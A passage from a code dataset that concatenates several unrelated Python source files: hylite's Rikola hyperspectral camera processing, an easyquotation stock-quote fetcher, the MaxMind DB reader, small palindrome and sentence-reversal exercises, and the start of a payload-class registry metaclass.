\", end=\"\", flush=\"True\")\n features = [image.get_keypoints(b) for b in range(image.band_count())]\n\n if verbose: print(\"DONE.\", flush=\"True\")\n\n if verbose: print(\"Stacking bands... \", end=\"\", flush=\"True\")\n\n # loop through bands and find matches\n matches = []\n for b in range(0, image.band_count()):\n if b == match_band:\n matches.append(None)\n continue # skip reference band as it doesn't need to be moved...\n if verbose: print(\"Matching bands... %d \" % int((100 * b) / image.band_count()) + \"% \\r\", end=\"\", flush=\"True\")\n\n # can we match this band with the reference band?\n src_pts, dst_pts = io.HyImage.match_keypoints(features[b][0], features[match_band][0],\n features[b][1], features[match_band][1],\n method='SIFT', dist=match_dist)\n matches.append((src_pts, dst_pts))\n\n if verbose: print(\"Matching bands... DONE. \", flush=\"True\")\n\n # apply transformation to each band\n for b in range(0, image.band_count()):\n if b == match_band: continue # skip reference band as it doesn't need to be moved...\n if verbose: print(\"Stacking bands... %d \" % int((100 * b) / image.band_count()) + \"% \\r\", end=\"\",flush=\"True\")\n\n # get match points\n src_pts, dst_pts = matches[b]\n if src_pts is None: # couldn't match with reference band, try matching with one of the already aligned bands\n print(\"Warning - could not directly band %d. Attempting indirect alignment... \" % b, end=\"\",\n flush=\"True\")\n i = 1\n while src_pts is None:\n if b - i < 0: # run out of bands\n print(\"Failed to align band\" % b)\n break\n\n # calculate features in aligned band\n feat2 = image.get_keypoints(b-i, eq=eq, contrastThreshold=contrast_thresh,\n edgeThreshold=edge_thresh, sigma=sigma)\n\n # try matching\n src_pts, dst_pts = io.HyImage.match_keypoints(features[b][0], feat2[0],\n features[b][1], feat2[1],\n dist=match_dist, method='sift')\n\n print(\"Aligned to band %d\" % (b - i))\n\n # do alignment\n if not src_pts is None:\n if ('affine' in warp.lower()) or ('flow' in warp.lower()):\n H, status = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n dst_mask = dst_pts[:, 0, :] * status\n src_mask = src_pts[:, 0, :] * status\n dst_mask = dst_mask[dst_mask.all(1)]\n src_mask = src_mask[src_mask.all(1)]\n dst_mask = np.expand_dims(dst_mask, axis=1)\n src_mask = np.expand_dims(src_mask, axis=1)\n #M = cv2.estimateRigidTransform(src_mask, dst_mask, False)\n M = cv2.estimateAffinePartial2D(src_mask, dst_mask)[0]\n\n # apply to image\n image.data[:, :, b] = cv2.warpAffine(image.data[:, :, b], M,\n (image.data.shape[1], image.data.shape[0]))\n\n # apply to edge mask\n for e in range(0, 4):\n edge_accum[:, :, e] += cv2.warpAffine(image.edge_mask[:, :, e], M,\n (image.edge_mask.shape[1], image.edge_mask.shape[0]))\n\n elif ('homography' in warp.lower()):\n H, status = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 3.0)\n\n # apply to image\n image.data[:, :, b] = cv2.warpPerspective(image.data[:, :, b], H,\n (image.data.shape[1], image.data.shape[0]))\n\n # apply to edge mask\n for e in range(0, 4):\n edge_accum[:, :, e] += cv2.warpPerspective(image.edge_mask[:, :, e], H,\n (image.edge_mask.shape[1],\n image.edge_mask.shape[0]))\n else:\n assert False, \"Error - unknown transformation type. 
Should be 'flow' or 'homography' or 'affine'.\"\n\n # update edge mask\n image.edge_mask = edge_accum\n\n # crop image to area of complete overlap\n xmin = np.min(np.where(np.sum(image.edge_mask[:, :, 0], axis=1) == 0.0))\n xmax = np.max(np.where(np.sum(image.edge_mask[:, :, 1], axis=1) == 0.0))\n ymin = np.min(np.where(np.sum(image.edge_mask[:, :, 2], axis=0) == 0.0))\n ymax = np.max(np.where(np.sum(image.edge_mask[:, :, 3], axis=0) == 0.0))\n if crop:\n image.data = image.data[xmin:xmax, ymin:ymax, :]\n else:\n image.data[:xmin, :, :] = 0.\n image.data[xmax:, :, :] = 0.\n image.data[:, :ymin, :] = 0.\n image.data[:, ymax:, :] = 0.\n\n # apply flow transform to aligned bands\n if 'flow' in warp.lower():\n\n # reset edge mask\n image.edge_mask = np.zeros(image.data[:, :, 0:4].shape, dtype=np.float32)\n image.edge_mask[0:3, :, 0] = 1.0\n image.edge_mask[-4:-1, :, 1] = 1.0\n image.edge_mask[:, 0:3, 2] = 1.0\n image.edge_mask[:, -4:-1, 3] = 1.0\n edge_accum = np.zeros_like(image.edge_mask)\n alg = cv2.optflow.createOptFlow_DeepFlow()\n X, Y = np.meshgrid(range(image.data.shape[1]), range(image.data.shape[0]))\n map = np.dstack([X, Y]).astype(np.float32)\n bnd1 = np.uint8(255 * (image.data[:, :, 0] - np.nanmin(image.data[:, :, 0])) /\n (np.nanmax(image.data[:, :, 0]) - np.nanmin(image.data[:, :, 0])))\n for b in range(1, image.band_count()):\n if verbose: print(\"Warping bands... %d \" % int((100 * b) / image.band_count()) + \"% \\r\", end=\"\",\n flush=\"True\")\n bnd2 = np.uint8(255 * (image.data[:, :, b] - np.nanmin(image.data[:, :, b])) /\n (np.nanmax(image.data[:, :, b]) - np.nanmin(image.data[:, :, b])))\n bnd1[bnd2 == 0.] = 0.\n bnd2[bnd1 == 0.] = 0.\n flow = alg.calc(bnd1, bnd2, None)\n map[:, :, 0] += flow[:, :, 0]\n map[:, :, 1] += flow[:, :, 1]\n image.data[:, :, b] = cv2.remap(image.data[:, :, b], map, None, cv2.INTER_LINEAR)\n image.data[:, :, b][bnd2 == 0.] = 0.\n for e in range(0, 4):\n edge_accum[:, :, e] += cv2.remap(image.edge_mask[:, :, e], map, None, cv2.INTER_LINEAR)\n bnd1 = bnd2\n\n image.edge_mask = edge_accum\n\n # crop again\n\n xmin = np.min(np.where(np.sum(image.edge_mask[:, :, 0], axis=1) == 0.0))\n xmax = np.max(np.where(np.sum(image.edge_mask[:, :, 1], axis=1) == 0.0))\n ymin = np.min(np.where(np.sum(image.edge_mask[:, :, 2], axis=0) == 0.0))\n ymax = np.max(np.where(np.sum(image.edge_mask[:, :, 3], axis=0) == 0.0))\n if crop:\n image.data = image.data[xmin:xmax, ymin:ymax, :]\n else:\n image.data[:xmin, :, :] = 0.\n image.data[xmax:, :, :] = 0.\n image.data[:, :ymin, :] = 0.\n image.data[:, ymax:, :] = 0.\n if verbose: print(\"Warping bands... DONE. \", flush=\"True\")\n\n @classmethod\n def correct_folder(cls, path, **kwds):\n \"\"\"\n Many sensors use simple/common data structures to store data/headers/dark reference etc. Hence it is often easiest\n to pass an output folder to the sensor for correction.\n\n Args:\n path (str): a path to the folder containing the sensor specific data.\n **kwds: Keywords will be passed to correct_image, except for:\n\n - multi = True if multiple threads will be spawned to processes images in parallel. Default is True.\n - nthreads = the number of worker threads to spawn if multithreaded is true. Default is the number of CPU cores.\n\n Returns:\n A hyImage to which all sensor-specific corrections have been applied. 
Note that this will generally not include\n topographic or atmospheric corrections.\n \"\"\"\n\n assert os.path.isdir(path), \"Error - %s is not a valid directory path\" % path\n assert os.path.exists(path), \"Error - could not find %s\" % path\n\n #get keywords\n multi = kwds.get('multi', True)\n nthread = kwds.get('nthreads', os.cpu_count())\n overwrite = kwds.get('overwrite', False)\n\n if nthread is None:\n print(\"Warning - could not identify CPU count. Multithreading disabled.\")\n multi = False\n\n #find images to process\n images = list(Path(path).rglob(\"*Calib*[0-9][0-9][0-9][0-9][0-9].hdr\")) #old rikola files\n images += list(Path(path).rglob(\"*Sequence*[0-9][0-9][0-9][0-9][0-9].hdr\")) #new rikola files\n\n if not overwrite: # ignore already corrected files\n images = [x for x in images if list(Path(path).rglob(x.name[:-4] + \"_CORRECTED.hdr\")) == []]\n\n corrected = []\n print(\"Processing %d images with the following settings: %s\" % (len(images),kwds))\n if multi: #run in multithreaded\n p = Pool(processes = nthread) #setup pool object with n threads\n corrected = list(tqdm( p.imap_unordered(Rikola._cmp, [(i, kwds) for i in images]), total=len(images),leave=False)) #distribute tasks\n else: #not multithreaded\n for pth in tqdm(images,leave=False):\n # noinspection PyCallByClass\n corrected.append(Rikola._cmp( (pth, kwds) ) )#\n\n return corrected\n\n # define worker function for correct_folder( ... ) multithreading\n @classmethod\n def _cmp(cls, args):\n pth = str(args[0])\n kwds = args[1]\n image = io.load(pth) # load image\n Rikola.correct_image(image, False, **kwds) # correct image\n io.saveWithGDAL(os.path.splitext(pth)[0] + \"_CORRECTED.hdr\", image) # save corrected image\n return os.path.splitext(pth)[0] + \"_CORRECTED.hdr\" # return corrected path\n\n @classmethod\n def GPS_JPG(cls, MAIN):\n \"\"\"\n Creates geotagged RGB JPGs for a folder of calibrated Rikola images and stores them in a subfolder \"RGB/\"\n\n Args:\n MAIN (str): path to the folder containing the image data (ending with \"CORRECTED.dat\")\n as well as the acquisition-specific \"TASKFILE.TXT\"\n\n \"\"\"\n\n try:\n import osgeo.gdal as gdal # todo - remove GDAL dependency for this function (replace with Pillow?)\n except:\n assert False, \"Error - the GPS_JPG function requires GDAL to be installed.\"\n\n # create new folder for file storage\n if not os.path.exists(MAIN + 'RGB/'):\n os.makedirs(MAIN + 'RGB/')\n\n # read taskfile.txt containing GPS information\n with open(MAIN + 'TASKFILE.TXT') as f:\n task = f.readlines()\n task = np.asarray(task[60:])\n taskfile = np.asarray([task[i].split(\",\") for i in range(len(task))])\n\n # collect filelist for processing\n filelist = [root + '/' + file for root, _, files in os.walk(MAIN) for file in files if\n \"_CORRECTED.dat\" in file and \"xml\" not in file]\n\n # processing for each file in filelist\n for file in filelist:\n\n # read 3 bands (RGB) as PIL image\n raster = gdal.Open(file)\n band1 = raster.GetRasterBand(23).ReadAsArray()\n band2 = raster.GetRasterBand(7).ReadAsArray()\n band3 = raster.GetRasterBand(1).ReadAsArray()\n arr1 = band1.astype(np.float32)\n maxim = np.nanmax(band1)\n band1_255 = np.uint8(arr1 / maxim * 255)\n arr1 = band2.astype(np.float32)\n maxim = np.nanmax(arr1)\n band2_255 = np.uint8(arr1 / maxim * 255)\n arr1 = band3.astype(np.float32)\n maxim = np.nanmax(arr1)\n band3_255 = np.uint8(arr1 / maxim * 255)\n\n # find and extract file-relevant info from taskfile\n rawfilename = os.path.split(file)[1].replace('_CORRECTED.dat', 
'.DAT')[6:]\n            filenumber = np.where(taskfile[:, 0] == rawfilename)\n            test = taskfile[filenumber, 16].tolist()\n            altitude = float('[]'.join(test[0]))\n            longi = taskfile[filenumber, 11].tolist()\n            long = float('[]'.join(longi[0])) / 100\n            lati = taskfile[filenumber, 9].tolist()\n            lat = float('[]'.join(lati[0])) / 100\n            WEi = taskfile[filenumber, 12].tolist()\n            WE = ('[]'.join(WEi[0]))\n            NSi = taskfile[filenumber, 10].tolist()\n            NS = ('[]'.join(NSi[0]))\n            time = taskfile[1, 6]\n            date = str(\"%02d\" % (int((time.split(' ')[1]).split('.')[2]),) + ':' + \"%02d\" % (\n                int((time.split(' ')[1]).split('.')[1]),) + ':' + \"%02d\" % (int((time.split(' ')[1]).split('.')[0]),))\n            out = MAIN + 'RGB/' + os.path.split(file)[-1][:-4] + '.jpg'\n\n            # save jpg with exif using piexif\n            exif_dict = {'0th': {},\n                         '1st': {},\n                         'Exif': {},\n                         'GPS': {\n                             1: NS, # latituderef\n                             2: ((int(lat), 1), (int(100 * (lat - int(lat))), 1),\n                                 (int((100 * (lat - int(lat)) - int(100 * (lat - int(lat)))) * 6000), 100)), # Latitude\n                             3: WE, # Longituderef\n                             4: ((int(long), 1), (int(100 * (long - int(long))), 1),\n                                 (int((100 * (long - int(long)) - int(100 * (long - int(long)))) * 6000), 100)),\n                             # longitude\n                             6: (abs(int(altitude * 100)), 100), # Altitude\n                             7: (\n                                 (int((time.split(' ')[2]).split(':')[0]), 1), (int((time.split(' ')[2]).split(':')[1]), 1),\n                                 (int((float((time.split(' ')[2]).split(':')[2])) * 100), 10)),\n                             29: date}, # timestamp\n                     'Interop': {},\n                     'thumbnail': None}\n            exif_bytes = piexif.dump(exif_dict)\n            plt.imsave(out,np.dstack((band1_255, band2_255, band3_255)))\n            piexif.insert(exif_bytes, out)\n\n            \"\"\"\n            # save image and write EXIF information with exiftools instead\n            lat=(int(lat))+(int(100*(lat-int(lat))))/60.+(100*(lat-int(lat))-int(100*(lat-int(lat))))*6000/360000.0\n            long=(int(long))+(int(100*(long-int(long))))/60.+(100*(long-int(long))-int(100*(long-int(long))))*6000/360000.0\n            im.save(out)\n            pic = out.encode(\"utf-8\")\n            with exiftool.ExifTool() as et:\n                et.execute((\"-GPSLatitudeRef=\" + NS).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n                et.execute((\"-GPSLongitudeRef=\" + WE).encode(\"utf-8\"),b\"-overwrite_original\", pic)\n                et.execute((\"-GPSLatitude=\" + str(lat)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n                et.execute((\"-GPSLongitude=\" + str(long)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n                et.execute((\"-GPSAltitude=\" + str(altitude)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n                et.execute((\"-GPSTimeStamp=\" + str(time)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n                et.execute((\"-GPSDateStamp=\" + str(date)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n            \"\"\"\n\nclass Rikola_RSC1( Rikola ): # old Rikola\n\n    \"\"\"\n    Sensor specific details for the Rikola camera\n    \"\"\"\n    @classmethod\n    def name(cls):\n        \"\"\"\n        Returns this sensor's name\n        \"\"\"\n        return \"Rikola RSC-1\"\n\n    @classmethod\n    def fov(cls):\n        \"\"\"\n        Return the (vertical) sensor field of view.\n        \"\"\"\n        return 36.5\n\n    @classmethod\n    def ypixels(cls):\n        \"\"\"\n        Return the number of pixels in the y-dimension.\n        \"\"\"\n        return 1010\n\n    @classmethod\n    def xpixels(cls):\n        \"\"\"\n        Return the number of pixels in the x-dimension (==1 for line scanners).\n        \"\"\"\n        return 1010\n\n    @classmethod\n    def pitch(cls):\n        \"\"\"\n        Return the pitch (mm) of each pixel in the y-dimension (though most pixels are square).\n        \"\"\"\n        return 0.0055\n\nclass Rikola_HSC2( Rikola ): # new Rikola\n\n    \"\"\"\n    Sensor specific details for the Rikola camera\n    \"\"\"\n\n    @classmethod\n    def name(cls):\n        \"\"\"\n        
Returns this sensor's name\n        \"\"\"\n        return \"Rikola HSC-2\"\n\n    @classmethod\n    def fov(cls):\n        \"\"\"\n        Return the (vertical) sensor field of view.\n        \"\"\"\n        return 36.8\n\n    @classmethod\n    def ypixels(cls):\n        \"\"\"\n        Return the number of pixels in the y-dimension.\n        \"\"\"\n        return 1024\n\n    @classmethod\n    def xpixels(cls):\n        \"\"\"\n        Return the number of pixels in the x-dimension (==1 for line scanners).\n        \"\"\"\n        return 1024\n\n    @classmethod\n    def pitch(cls):\n        \"\"\"\n        Return the pitch of each pixel in the y-dimension (though most pixels are square).\n        \"\"\"\n        return 0.0055","repo_name":"hifexplo/hylite","sub_path":"hylite/sensors/rikola.py","file_name":"rikola.py","file_ext":"py","file_size_in_byte":27350,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"6"} +{"seq_id":"71950508987","text":"import easyquotation\nfrom six import iteritems\nfrom dateutil.parser import parse\nimport numpy as np\n\nfrom .utills import order_book_id_2_code, code_2_order_book_id\n\n\ndef get_quotation(order_book_ids, data_cache, resource='sina'):\n    tick_dict = {}\n\n    quotation = easyquotation.use(resource)\n\n    code_list = [order_book_id_2_code(order_book_id) for order_book_id in order_book_ids]\n\n    eq_dict = quotation.stocks(code_list)\n\n    for code, data in iteritems(eq_dict):\n        tick = {\n            'order_book_id': code_2_order_book_id(code),\n            'datetime': parse('%s %s' % (data['date'], data['time'])),\n            'open': data['open'],\n            'last': data['now'],\n            'low': data['low'],\n            'high': data['high'],\n            'prev_close': data['close'],\n            'volume': data['volume'],\n            'total_turnover': data['turnover'],\n            'open_interest': np.nan,\n            'prev_settlement': np.nan,\n\n            'bid': [\n                data['bid1'],\n                data['bid2'],\n                data['bid3'],\n                data['bid4'],\n                data['bid5'],\n            ],\n            'bid_volume': [\n                data['bid1_volume'],\n                data['bid2_volume'],\n                data['bid3_volume'],\n                data['bid4_volume'],\n                data['bid5_volume'],\n            ],\n            'ask': [\n                data['ask1'],\n                data['ask2'],\n                data['ask3'],\n                data['ask4'],\n                data['ask5'],\n            ],\n            'ask_volume': [\n                data['ask1_volume'],\n                data['ask2_volume'],\n                data['ask3_volume'],\n                data['ask4_volume'],\n                data['ask5_volume'],\n            ],\n\n            'limit_up': np.nan,\n            'limit_down': np.nan,\n        }\n        tick_dict[code_2_order_book_id(code)] = tick\n    data_cache.put(tick_dict, 'easy_quotation')\n","repo_name":"Cuizi7/quotation","sub_path":"quotation/eq.py","file_name":"eq.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"6"} +{"seq_id":"10776816712","text":"\"\"\"\nmaxminddb.reader\n~~~~~~~~~~~~~~~~\n\nThis module contains the pure Python database reader and related classes.\n\n\"\"\"\ntry:\n    import mmap\nexcept ImportError:\n    # pylint: disable=invalid-name\n    mmap = None  # type: ignore\n\nimport ipaddress\nimport struct\nfrom ipaddress import IPv4Address, IPv6Address\nfrom os import PathLike\nfrom typing import Any, AnyStr, IO, Optional, Tuple, Union\n\nfrom maxminddb.const import MODE_AUTO, MODE_MMAP, MODE_FILE, MODE_MEMORY, MODE_FD\nfrom maxminddb.decoder import Decoder\nfrom maxminddb.errors import InvalidDatabaseError\nfrom maxminddb.file import FileBuffer\nfrom maxminddb.types import Record\n\n_IPV4_MAX_NUM = 2**32\n\n\nclass Reader:\n    \"\"\"\n    Instances of this class provide a reader for the MaxMind DB format. 
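A minimal\n    illustrative usage (the ``.mmdb`` path here is a placeholder)::\n\n        with Reader('/path/to/GeoLite2-City.mmdb') as reader:\n            record = reader.get('128.101.101.101')\n\n    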
IP\n    addresses can be looked up using the ``get`` method.\n    \"\"\"\n\n    _DATA_SECTION_SEPARATOR_SIZE = 16\n    _METADATA_START_MARKER = b\"\\xAB\\xCD\\xEFMaxMind.com\"\n\n    _buffer: Union[bytes, FileBuffer, \"mmap.mmap\"]\n    _buffer_size: int\n    closed: bool\n    _decoder: Decoder\n    _metadata: \"Metadata\"\n    _ipv4_start: int\n\n    def __init__(\n        self, database: Union[AnyStr, int, PathLike, IO], mode: int = MODE_AUTO\n    ) -> None:\n        \"\"\"Reader for the MaxMind DB file format\n\n        Arguments:\n            database -- A path to a valid MaxMind DB file such as a GeoIP2 database\n                        file, or a file descriptor in the case of MODE_FD.\n            mode -- mode to open the database with. Valid modes are:\n                * MODE_MMAP - read from memory map.\n                * MODE_FILE - read database as standard file.\n                * MODE_MEMORY - load database into memory.\n                * MODE_AUTO - tries MODE_MMAP and then MODE_FILE. Default.\n                * MODE_FD - the param passed via database is a file descriptor, not\n                  a path. This mode implies MODE_MEMORY.\n        \"\"\"\n        filename: Any\n        if (mode == MODE_AUTO and mmap) or mode == MODE_MMAP:\n            with open(database, \"rb\") as db_file:  # type: ignore\n                self._buffer = mmap.mmap(db_file.fileno(), 0, access=mmap.ACCESS_READ)\n                self._buffer_size = self._buffer.size()\n            filename = database\n        elif mode in (MODE_AUTO, MODE_FILE):\n            self._buffer = FileBuffer(database)  # type: ignore\n            self._buffer_size = self._buffer.size()\n            filename = database\n        elif mode == MODE_MEMORY:\n            with open(database, \"rb\") as db_file:  # type: ignore\n                buf = db_file.read()\n                self._buffer = buf\n                self._buffer_size = len(buf)\n            filename = database\n        elif mode == MODE_FD:\n            self._buffer = database.read()  # type: ignore\n            self._buffer_size = len(self._buffer)  # type: ignore\n            filename = database.name  # type: ignore\n        else:\n            raise ValueError(\n                f\"Unsupported open mode ({mode}). Only MODE_AUTO, MODE_FILE, \"\n                \"MODE_MEMORY and MODE_FD are supported by the pure Python \"\n                \"Reader\"\n            )\n\n        metadata_start = self._buffer.rfind(\n            self._METADATA_START_MARKER, max(0, self._buffer_size - 128 * 1024)\n        )\n\n        if metadata_start == -1:\n            self.close()\n            raise InvalidDatabaseError(\n                f\"Error opening database file ({filename}). \"\n                \"Is this a valid MaxMind DB file?\"\n            )\n\n        metadata_start += len(self._METADATA_START_MARKER)\n        metadata_decoder = Decoder(self._buffer, metadata_start)\n        (metadata, _) = metadata_decoder.decode(metadata_start)\n\n        if not isinstance(metadata, dict):\n            raise InvalidDatabaseError(\n                f\"Error reading metadata in database file ({filename}).\"\n            )\n\n        self._metadata = Metadata(**metadata)  # pylint: disable=bad-option-value\n\n        self._decoder = Decoder(\n            self._buffer,\n            self._metadata.search_tree_size + self._DATA_SECTION_SEPARATOR_SIZE,\n        )\n        self.closed = False\n\n        ipv4_start = 0\n        if self._metadata.ip_version == 6:\n            # We store the IPv4 starting node as an optimization for IPv4 lookups\n            # in IPv6 trees. 
This allows us to skip over the first 96 nodes in\n # this case.\n node = 0\n for _ in range(96):\n if node >= self._metadata.node_count:\n break\n node = self._read_node(node, 0)\n ipv4_start = node\n self._ipv4_start = ipv4_start\n\n def metadata(self) -> \"Metadata\":\n \"\"\"Return the metadata associated with the MaxMind DB file\"\"\"\n return self._metadata\n\n def get(self, ip_address: Union[str, IPv6Address, IPv4Address]) -> Optional[Record]:\n \"\"\"Return the record for the ip_address in the MaxMind DB\n\n\n Arguments:\n ip_address -- an IP address in the standard string notation\n \"\"\"\n (record, _) = self.get_with_prefix_len(ip_address)\n return record\n\n def get_with_prefix_len(\n self, ip_address: Union[str, IPv6Address, IPv4Address]\n ) -> Tuple[Optional[Record], int]:\n \"\"\"Return a tuple with the record and the associated prefix length\n\n\n Arguments:\n ip_address -- an IP address in the standard string notation\n \"\"\"\n if isinstance(ip_address, str):\n address = ipaddress.ip_address(ip_address)\n else:\n address = ip_address\n\n try:\n packed_address = bytearray(address.packed)\n except AttributeError as ex:\n raise TypeError(\"argument 1 must be a string or ipaddress object\") from ex\n\n if address.version == 6 and self._metadata.ip_version == 4:\n raise ValueError(\n f\"Error looking up {ip_address}. You attempted to look up \"\n \"an IPv6 address in an IPv4-only database.\"\n )\n\n (pointer, prefix_len) = self._find_address_in_tree(packed_address)\n\n if pointer:\n return self._resolve_data_pointer(pointer), prefix_len\n return None, prefix_len\n\n def __iter__(self):\n return self._generate_children(0, 0, 0)\n\n def _generate_children(self, node, depth, ip_acc):\n if ip_acc != 0 and node == self._ipv4_start:\n # Skip nodes aliased to IPv4\n return\n\n node_count = self._metadata.node_count\n if node > node_count:\n bits = 128 if self._metadata.ip_version == 6 else 32\n ip_acc <<= bits - depth\n if ip_acc <= _IPV4_MAX_NUM and bits == 128:\n depth -= 96\n yield ipaddress.ip_network((ip_acc, depth)), self._resolve_data_pointer(\n node\n )\n elif node < node_count:\n left = self._read_node(node, 0)\n ip_acc <<= 1\n depth += 1\n yield from self._generate_children(left, depth, ip_acc)\n right = self._read_node(node, 1)\n yield from self._generate_children(right, depth, ip_acc | 1)\n\n def _find_address_in_tree(self, packed: bytearray) -> Tuple[int, int]:\n bit_count = len(packed) * 8\n node = self._start_node(bit_count)\n node_count = self._metadata.node_count\n\n i = 0\n while i < bit_count and node < node_count:\n bit = 1 & (packed[i >> 3] >> 7 - (i % 8))\n node = self._read_node(node, bit)\n i = i + 1\n\n if node == node_count:\n # Record is empty\n return 0, i\n if node > node_count:\n return node, i\n\n raise InvalidDatabaseError(\"Invalid node in search tree\")\n\n def _start_node(self, length: int) -> int:\n if self._metadata.ip_version == 6 and length == 32:\n return self._ipv4_start\n return 0\n\n def _read_node(self, node_number: int, index: int) -> int:\n base_offset = node_number * self._metadata.node_byte_size\n\n record_size = self._metadata.record_size\n if record_size == 24:\n offset = base_offset + index * 3\n node_bytes = b\"\\x00\" + self._buffer[offset : offset + 3]\n elif record_size == 28:\n offset = base_offset + 3 * index\n node_bytes = bytearray(self._buffer[offset : offset + 4])\n if index:\n node_bytes[0] = 0x0F & node_bytes[0]\n else:\n middle = (0xF0 & node_bytes.pop()) >> 4\n node_bytes.insert(0, middle)\n elif record_size == 32:\n 
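# 32-bit records are the simplest case: each node is 8 bytes and each\n            # child pointer is one whole big-endian 32-bit word (see \"!I\" below).\n            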
offset = base_offset + index * 4\n            node_bytes = self._buffer[offset : offset + 4]\n        else:\n            raise InvalidDatabaseError(f\"Unknown record size: {record_size}\")\n        return struct.unpack(b\"!I\", node_bytes)[0]\n\n    def _resolve_data_pointer(self, pointer: int) -> Record:\n        resolved = pointer - self._metadata.node_count + self._metadata.search_tree_size\n\n        if resolved >= self._buffer_size:\n            raise InvalidDatabaseError(\"The MaxMind DB file's search tree is corrupt\")\n\n        (data, _) = self._decoder.decode(resolved)\n        return data\n\n    def close(self) -> None:\n        \"\"\"Closes the MaxMind DB file and returns the resources to the system\"\"\"\n        try:\n            self._buffer.close()  # type: ignore\n        except AttributeError:\n            pass\n        self.closed = True\n\n    def __exit__(self, *args) -> None:\n        self.close()\n\n    def __enter__(self) -> \"Reader\":\n        if self.closed:\n            raise ValueError(\"Attempt to reopen a closed MaxMind DB\")\n        return self\n\n\nclass Metadata:\n    \"\"\"Metadata for the MaxMind DB reader\n\n\n    .. attribute:: binary_format_major_version\n\n        The major version number of the binary format used when creating the\n        database.\n\n        :type: int\n\n    .. attribute:: binary_format_minor_version\n\n        The minor version number of the binary format used when creating the\n        database.\n\n        :type: int\n\n    .. attribute:: build_epoch\n\n        The Unix epoch for the build time of the database.\n\n        :type: int\n\n    .. attribute:: database_type\n\n        A string identifying the database type, e.g., \"GeoIP2-City\".\n\n        :type: str\n\n    .. attribute:: description\n\n        A map from locales to text descriptions of the database.\n\n        :type: dict(str, str)\n\n    .. attribute:: ip_version\n\n        The IP version of the data in a database. A value of \"4\" means the\n        database only supports IPv4. A database with a value of \"6\" may support\n        both IPv4 and IPv6 lookups.\n\n        :type: int\n\n    .. attribute:: languages\n\n        A list of locale codes supported by the database.\n\n        :type: list(str)\n\n    .. attribute:: node_count\n\n        The number of nodes in the database.\n\n        :type: int\n\n    .. attribute:: record_size\n\n        The bit size of a record in the search tree.\n\n        :type: int\n\n    \"\"\"\n\n    # pylint: disable=too-many-instance-attributes\n    def __init__(self, **kwargs) -> None:\n        \"\"\"Creates new Metadata object. 
kwargs are key/value pairs from spec\"\"\"\n        # Although I could just update __dict__, that is less obvious and it\n        # doesn't work well with static analysis tools and some IDEs\n        self.node_count = kwargs[\"node_count\"]\n        self.record_size = kwargs[\"record_size\"]\n        self.ip_version = kwargs[\"ip_version\"]\n        self.database_type = kwargs[\"database_type\"]\n        self.languages = kwargs[\"languages\"]\n        self.binary_format_major_version = kwargs[\"binary_format_major_version\"]\n        self.binary_format_minor_version = kwargs[\"binary_format_minor_version\"]\n        self.build_epoch = kwargs[\"build_epoch\"]\n        self.description = kwargs[\"description\"]\n\n    @property\n    def node_byte_size(self) -> int:\n        \"\"\"The size of a node in bytes\n\n        :type: int\n        \"\"\"\n        return self.record_size // 4\n\n    @property\n    def search_tree_size(self) -> int:\n        \"\"\"The size of the search tree\n\n        :type: int\n        \"\"\"\n        return self.node_count * self.node_byte_size\n\n    def __repr__(self):\n        args = \", \".join(f\"{k}={v!r}\" for k, v in self.__dict__.items())\n        return f\"{self.__module__}.{self.__class__.__name__}({args})\"\n","repo_name":"maxmind/MaxMind-DB-Reader-python","sub_path":"maxminddb/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":12183,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"6"} +{"seq_id":"24333876062","text":"def sent_rev(s):\n    l=[]\n    x=s.split(' ')\n    l=x[::-1]\n    # drop empty strings left at either end by leading/trailing spaces\n    if l and l[0]=='':\n        l.pop(0)\n    if l and l[-1]=='':\n        l.pop()\n    s=str(' '.join(l))\n    return s\n    \nprint(sent_rev(' Hi John, are you ready to go? '))\n\n\n'''\n\ngo? to ready you are John, Hi\n\n\n'''\n","repo_name":"nami-h/Python","sub_path":"sentence reversal and remove leading and trailing space.py","file_name":"sentence reversal and remove leading and trailing space.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73949723068","text":"n = 1000000\nx = 0\n\n#Set the interval for the number x\nwhile n <= 1000000000:\n\n    temp = n\n    rev = 0\n\n    #\"Reverse\" the digits of the number\n    while temp > 0:\n        num = temp % 10\n        rev = rev * 10 + num\n        temp = temp // 10\n\n    #Compare the number x with its mirror image\n    if rev == n:\n        print(str(n), end = ' ')\n        x += 1\n\n    n += 1\n\n#Print the number of palindromes in the interval\nprint(\"\\n\" + str(x) + \" palindromes\")\n","repo_name":"smrtfl/KPI","sub_path":"I-semester/OP-Labs/lab5/lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70766865147","text":"from abc import ABCMeta\nfrom typing import (\n    Tuple,\n    Any,\n    Dict\n)\nimport inspect\nfrom binascii import crc32\nimport re\n\n_SIGN_PAYLOAD = {}\n_NAME_PAYLOAD = {}\n\n\nclass PayloadMeta(ABCMeta):\n    def __new__(mcs, mcs_name, mcs_bases, mcs_namespace):\n        new_namespace = {\n            '__constructor__': None,\n            '__decorated__': None,\n        }\n        new_namespace.update(mcs_namespace)\n\n        new_namespace.update({\n            'SIGN': property(fget=lambda *_: sign),\n        })\n\n        cls = super().__new__(\n            mcs,\n            mcs_name,\n            mcs_bases,\n            new_namespace,\n        )\n        try:\n            sign = inspect.getsource(cls)\n            constructor = cls\n        except OSError:\n            # payload class created using a decorator\n            sign = inspect.getsource(cls.__decorated__)\n            constructor = cls.__constructor__\n\n        sign = f\"{crc32(sign.encode('utf-8')):x}\"\n        _SIGN_PAYLOAD[sign] = constructor\n        _NAME_PAYLOAD[cls.NAME] = constructor\n        return cls\n\n\nclass BasePayload(object, 
